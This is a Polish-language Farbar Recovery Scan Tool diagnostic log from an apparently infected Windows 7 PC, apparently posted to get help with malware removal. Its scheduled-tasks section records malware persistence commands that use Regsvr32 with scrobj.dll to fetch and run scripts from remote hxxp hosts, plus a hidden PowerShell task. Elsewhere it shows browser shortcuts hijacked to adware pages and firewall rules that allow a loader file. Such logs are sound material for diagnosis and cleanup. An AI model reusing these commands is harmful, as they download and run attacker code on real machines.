Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 08-05-2017 Uruchomiony przez Kamcio (13-05-2017 10:14:39) Uruchomiony z C:\Program1\programy virus Windows 7 Ultimate Service Pack 1 (X64) (2016-08-13 10:11:44) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-1286252044-1160479171-464530157-500 - Administrator - Disabled) Gość (S-1-5-21-1286252044-1160479171-464530157-501 - Limited - Disabled) Kamcio (S-1-5-21-1286252044-1160479171-464530157-1000 - Administrator - Enabled) => C:\Users\Kamcio ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AV: Malwarebytes (Disabled - Out of date) {23007AD3-69FE-687C-2629-D584AFFAF72B} AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96} AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKLM-x32\...\uTorrent) (Version: 2.2.1 - ) 888poker (HKLM-x32\...\888poker) (Version: - ) abgx360 v1.0.6 (HKLM-x32\...\abgx360) (Version: - ) Ace Stream Media 3.1.16.1 (HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\AceStream) (Version: 3.1.16.1 - Ace Stream Media) <==== UWAGA Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated) Adobe Reader 9.1 - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated) Aktualizacje NVIDIA 2.11.4.0 (Version: 2.11.4.0 - NVIDIA Corporation) Hidden Ansel (Version: 368.81 - NVIDIA Corporation) Hidden Browser-Security (HKLM-x32\...\Browser-Security) (Version: 1.2.0.0 - Vondos Media GmbH) <==== UWAGA Chessmaster Grandmaster Edition PL Patch 1.2.0 (HKLM-x32\...\CMGE_is1) (Version: - ) Counter-Strike Nexon: Zombies (HKLM\...\Steam App 273110) (Version: - Nexon) Counter-Strike: Global Offensive (HKLM\...\Steam App 730) (Version: - Valve) EVEREST Ultimate Edition v5.50 (HKLM-x32\...\EVEREST Ultimate Edition_is1) (Version: 5.50 - Lavalys, Inc.) Hurtworld (HKLM\...\Steam App 393420) (Version: - Bankroll Studios) Image Resizer for Windows (64 bit) (Version: 3.0.4802.35565 - Brice Lambson) Hidden Image Resizer for Windows (HKLM-x32\...\{69d72156-6582-4556-8637-06f40aa7f85b}) (Version: 3.0.4802.35565 - Brice Lambson) ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.8.0 - LIGHTNING UK!) Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation) Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation) Microsoft .NET Framework 4.5.2 (Polski) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1045) (Version: 4.5.51209 - Microsoft Corporation) Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61187 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61186 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.7523 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.7523 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.7523 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (HKLM\...\{929FBD26-9020-399B-9A7A-751D61F0B942}) (Version: 12.0.21005 - Microsoft Corporation) Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (HKLM\...\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}) (Version: 12.0.21005 - Microsoft Corporation) Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (HKLM-x32\...\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}) (Version: 12.0.21005 - Microsoft Corporation) Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (HKLM-x32\...\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}) (Version: 12.0.21005 - Microsoft Corporation) Microsoft Visual C++ 2015 x64 Additional Runtime - 14.0.22609 (HKLM\...\{7FAA7151-D2F2-3CB5-A82B-16410DC068F6}) (Version: 14.0.22609 - Microsoft Corporation) Microsoft Visual C++ 2015 x64 Minimum Runtime - 14.0.22609 (HKLM\...\{6246A9E2-24AE-3CEE-8C52-1CCE7F0E4006}) (Version: 14.0.22609 - Microsoft Corporation) Microsoft Visual C++ 2015 x86 Additional Runtime - 14.0.22609 (HKLM-x32\...\{E4E510C1-EC51-3DB5-A1A1-E6116853EF7B}) (Version: 14.0.22609 - Microsoft Corporation) Microsoft Visual C++ 2015 x86 Minimum Runtime - 14.0.22609 (HKLM-x32\...\{9B5D95E8-316C-3390-B4A5-EB7B6D8F228D}) (Version: 14.0.22609 - Microsoft Corporation) MKVToolNix 9.2.0 (64bit) [20160504-01204] (HKLM-x32\...\MKVToolNix) (Version: 9.2.0 - Moritz Bunkus) Mozilla Firefox 52.0.2 (x86 pl) (HKLM-x32\...\Mozilla Firefox 52.0.2 (x86 pl)) (Version: 52.0.2 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 52.0.2.6291 - Mozilla) Narzędzia sprawdzające pakietu Microsoft Office 2016 — polski (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation) NVIDIA Oprogramowanie systemu PhysX 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation) NVIDIA Sterownik 3D Vision 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 368.81 - NVIDIA Corporation) NVIDIA Sterownik dźwięku HD 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation) NVIDIA Sterownik graficzny 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 368.81 - NVIDIA Corporation) NVIDIA Sterownik kontrolera 3D Vision 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation) Panel sterowania NVIDIA 368.81 (Version: 368.81 - NVIDIA Corporation) Hidden ScreenShot (HKLM-x32\...\ScreenShot) (Version: 2.0.4 - Filseclab Corporation) SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) Update for Skype for Business 2016 (KB3114846) 64-Bit Edition (HKLM\...\{90160000-0011-0000-1000-0000000FF1CE}_Office16.PROPLUS_{286F464B-2FDF-4107-83A5-DEB08D2AD268}) (Version: - Microsoft) Update for Skype for Business 2016 (KB3114846) 64-Bit Edition (HKLM\...\{90160000-00C1-0000-1000-0000000FF1CE}_Office16.PROPLUS_{286F464B-2FDF-4107-83A5-DEB08D2AD268}) (Version: - Microsoft) Update for Skype for Business 2016 (KB3114846) 64-Bit Edition (HKLM\...\{90160000-012B-0415-1000-0000000FF1CE}_Office16.PROPLUS_{286F464B-2FDF-4107-83A5-DEB08D2AD268}) (Version: - Microsoft) Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.) WinRAR 5.10 (64-bitowy) (HKLM\...\WinRAR archiver) (Version: 5.10.0 - win.rar GmbH) YAC(Yet Another Cleaner!) (HKLM-x32\...\iSafe) (Version: - ELEX DO BRASIL PARTICIPAÇÕES LTDA) <==== UWAGA ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) HKU\S-1-5-21-1286252044-1160479171-464530157-1000\...\ChromeHTML: -> "C:\Program Files (x86)\Eastness\Application\chrome.exe" "%1" <==== UWAGA ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {6203CC12-9946-4ACB-AC94-F18040952DE9} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj1SM8NSFdJXRURQRYM4NjVLMjUxNYMyFThWMdH2FTUcOF== scrobj.dll Task: {972BBDAF-9761-4F05-B294-188E9C61190F} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 Task: {9C005C3C-21AB-4134-AFA5-EC0DF09487B6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [2015-07-31] (Microsoft Corporation) Task: {A165939C-A4E8-4788-B2DA-52FF7FEA1F2A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation) Task: {D913CD08-EBA7-4576-988C-7360C1B0D1DE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation) Task: {F690F3D8-A0FC-4C09-ABDA-04A72C3D612E} - System32\Tasks\{466909E0-448E-4C7D-BAF2-F6530C129041} => pcalua.exe -a "C:\Program Files (x86)\PACIFI~1\UNWISE.EXE" -c C:\Program Files (x86)\PACIFI~1\INSTALL.LOG Task: {FE0B4247-E695-4DDE-AB24-46A265AA39D5} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj1SM8NSFdJXRURQRYM4NjVLMjUxNYMyFThWMdH2FTUcOF== scrobj.dll Task: {FEEB362B-4A73-48DB-B37A-25B65484F9F4} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-09] () <==== UWAGA (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) Shortcut: C:\Users\Kamcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Kamcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) Shortcut: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) Shortcut: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Dayglad\Application\chrome.exe (Google Inc.) ShortcutWithArgument: C:\Users\Kamcio\Desktop\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Kamcio\Desktop\Stare dane programu Firefox\big_bang_empire (2).lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 ShortcutWithArgument: C:\Users\Kamcio\Desktop\Stare dane programu Firefox\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 ShortcutWithArgument: C:\Users\Kamcio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 ShortcutWithArgument: C:\Users\Kamcio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 ShortcutWithArgument: C:\Users\Kamcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 ShortcutWithArgument: C:\Users\Kamcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BigFarm.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -Command "& {Start-Process -FilePath hxxp://bigfarm.goodgamestudios.com/?w=239064}"; ShortcutWithArgument: C:\Users\Kamcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1492582367&z=71512a05557f726cf9e1f37g9z7t6oew8bao1c7qbo&from=che0812&uid=SAMSUNGXHD322HJ_S17AJA0S836665 ShortcutWithArgument: C:\Users\Kamcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://bigfarm.goodgamestudios.com/?w=239064 ShortcutWithArgument: C:\Users\Kamcio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk -> C:\Program Files (x86)\Firefox\Firefox.exe (Mozilla Corporation) -> hxxp://www.bigbangempire.com/?ref=281-000-000-005 ==================== Załadowane moduły (filtrowane) ============== 2016-08-13 11:48 - 2016-07-11 01:17 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 00367552 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\MessageBus.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 01147328 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\libprotobuf.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 03611584 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Poco.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 00288192 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 02665920 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvMdnsPlugin.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 01988544 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\NvPortForwardPlugin.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 01840576 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\Plugins\NSS\RtspPlugin.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 00207296 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\RtspServer.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 00034240 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_system-vc120-mt-1_58.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 00920000 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\boost_regex-vc120-mt-1_58.dll 2016-08-13 11:49 - 2016-06-14 22:03 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll 2016-08-13 12:13 - 2017-03-10 02:13 - 00674592 _____ () C:\Program Files (x86)\Steam\SDL2.dll 2016-08-13 12:13 - 2016-09-01 03:02 - 04969248 _____ () C:\Program Files (x86)\Steam\v8.dll 2016-08-13 12:13 - 2016-09-01 03:02 - 01563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll 2016-08-13 12:13 - 2016-09-01 03:02 - 01195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll 2016-08-13 12:13 - 2017-04-26 01:55 - 02465056 _____ () C:\Program Files (x86)\Steam\video.dll 2016-08-13 12:13 - 2016-01-27 09:49 - 02549760 _____ () C:\Program Files (x86)\Steam\libavcodec-56.dll 2016-08-13 12:13 - 2016-01-27 09:49 - 00442880 _____ () C:\Program Files (x86)\Steam\libavutil-54.dll 2016-08-13 12:13 - 2016-01-27 09:49 - 00491008 _____ () C:\Program Files (x86)\Steam\libavformat-56.dll 2016-08-13 12:13 - 2016-01-27 09:49 - 00332800 _____ () C:\Program Files (x86)\Steam\libavresample-2.dll 2016-08-13 12:13 - 2016-01-27 09:49 - 00485888 _____ () C:\Program Files (x86)\Steam\libswscale-3.dll 2016-08-13 12:13 - 2017-04-26 01:55 - 00848672 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL 2016-08-13 12:13 - 2016-07-05 00:17 - 00266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll 2017-05-04 18:24 - 2017-05-09 16:40 - 00323584 _____ () C:\Users\Kamcio\AppData\Local\background_fault\bf.dll 2016-12-26 23:09 - 2017-01-30 23:41 - 68875552 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll 2016-08-13 12:13 - 2017-04-26 01:55 - 00383776 _____ () C:\Program Files (x86)\Steam\steam.dll 2017-05-03 14:33 - 2017-05-03 04:45 - 00105984 _____ () c:\program files (x86)\iis\microsoft web deploy v3\te\msdeploy.resources.dll 2017-05-03 14:33 - 2017-05-03 04:45 - 00105984 _____ () C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\te\msdeploy.resources.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-1286252044-1160479171-464530157-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Kamcio\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 217.172.224.170 - 89.231.1.206 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\Services: FirefoxU => 2 MSCONFIG\Services: iSafeService => 2 MSCONFIG\Services: SSSvc => 2 MSCONFIG\startupreg: safe_urls768 => "C:\Users\Kamcio\AppData\Roaming\Browser-Security\s768.exe" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{D03477C4-28A3-4E19-B907-CFDEAACA548C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{3711D7F8-3AC3-41A0-9078-3C57894D3ECF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{F72082F6-A892-498D-967B-43B2C1373040}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{100007E5-0F65-4D0F-9EF0-8F6D96DACF48}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe FirewallRules: [{0367DB9F-909F-4C26-9AB0-6D10CAD81392}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{5BA9FFF8-C9B6-48C3-8C2D-778048C41DF0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe FirewallRules: [{BE548646-3C8A-4E2F-9A69-E54003A908B9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe FirewallRules: [{A5CCBDD5-9833-4069-8255-B1234924E584}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{BE4C56B8-2B3E-49FC-AEDD-1EAF53099692}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe FirewallRules: [{46DEFD00-8B3C-4788-B0E1-F8E399444049}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{A2534A16-0262-40A1-BF0F-C1B7D05378B8}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{456E75AD-A080-47E8-BF12-38E651C0B3BF}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{FEC3BCCE-15B0-4C44-A2E3-E99AEB841CE5}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe FirewallRules: [{A750DB53-38F4-4729-AAD6-D1DE35EC92CB}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hurtworld\Hurtworld.exe FirewallRules: [{6DA15B34-09AB-4842-A42F-D3ACFF8FBD21}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hurtworld\Hurtworld.exe FirewallRules: [{8C115105-F84A-434D-A29E-3D4F4632FDF2}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hurtworld\HurtworldClient.exe FirewallRules: [{EBC14FB3-5DA6-46F3-BC3C-A648B499BEB7}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Hurtworld\HurtworldClient.exe FirewallRules: [{E897EC21-7211-4EDF-B076-069A991687EF}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{1FBDF4C9-F82F-4D81-BA25-F8F4A256E5A0}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe FirewallRules: [{73B17036-4246-4AA5-BE3D-B1D8D407AFD5}] => (Allow) C:\Program Files (x86)\uTorrent\uTorrent.exe FirewallRules: [{48E37F57-68C7-4500-BDEB-E1574F2F1386}] => (Allow) C:\Program Files (x86)\uTorrent\uTorrent.exe FirewallRules: [{371604F5-C8E0-4DFE-A64E-552A7B6E00C6}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe FirewallRules: [{A6DA3ADA-F65D-470E-9A40-41BE2FBEEEAD}] => (Allow) C:\Program Files\Microsoft Office\Office16\lync.exe FirewallRules: [{CAB159B0-AEC3-4F6B-B8A6-D277BB73501D}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe FirewallRules: [{F9DBDFBC-D2F9-4DB0-9F50-8DE9DE6386C3}] => (Allow) C:\Program Files\Microsoft Office\Office16\UcMapi.exe FirewallRules: [TCP Query User{FC8C291C-F4AC-448D-BB19-18AC0B764A55}C:\program files (x86)\ubisoft\chessmaster grandmaster edition\game.exe] => (Allow) C:\program files (x86)\ubisoft\chessmaster grandmaster edition\game.exe FirewallRules: [UDP Query User{939F22A6-11F8-482A-98E8-AD2854BABE7C}C:\program files (x86)\ubisoft\chessmaster grandmaster edition\game.exe] => (Allow) C:\program files (x86)\ubisoft\chessmaster grandmaster edition\game.exe FirewallRules: [{797099E4-A6D8-4579-896E-A81ED9336F5D}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{878814D2-A10B-45CC-A79E-E8A99432BEF9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{6A5B0B47-73D7-40AF-A4E6-605C1B273DE0}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe FirewallRules: [{1267865E-9A01-49A1-8947-03682A124F83}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe FirewallRules: [{556BC919-D4FC-4F9B-999C-4E3540FB7212}] => (Allow) C:\Program Files (x86)\Dayglad\Application\chrome.exe FirewallRules: [{A4590B41-DA32-440A-B13B-AF45B76761E9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CSNZ\Bin\cstrike-online.exe FirewallRules: [{C0103908-147A-46BD-A042-1B7DE68B0CE3}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CSNZ\Bin\cstrike-online.exe FirewallRules: [{6DFA3E24-F5DA-494D-ADD3-BA8B3E9D1CD8}] => (Allow) C:\Users\Kamcio\AppData\Roaming\ACEStream\engine\ace_engine.exe FirewallRules: [{FD5711E0-112B-433E-8890-B20417E42534}] => (Allow) C:\Users\Kamcio\AppData\Roaming\ACEStream\engine\ace_engine.exe FirewallRules: [{796288F4-3B45-455A-9C14-81CB5AFCD5D3}] => (Allow) C:\Program Files (x86)\MIO\loader\samsungxhd322hj_s17aja0s836665.dat FirewallRules: [{A752D20E-997D-42AA-98FB-FD598AB637C2}] => (Allow) C:\Program Files (x86)\MIO\loader\samsungxhd322hj_s17aja0s836665.dat ==================== Punkty Przywracania systemu ========================= 07-05-2017 14:27:12 Zaplanowany punkt kontrolny 12-05-2017 20:03:45 Removed AlphaGo 12-05-2017 20:04:13 Removed AlphaGo ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Teredo Tunneling Pseudo-Interface Description: Karta tunelowania Teredo firmy Microsoft Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. Name: YAC Kit Driver Description: YAC Kit Driver Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1} Manufacturer: Service: 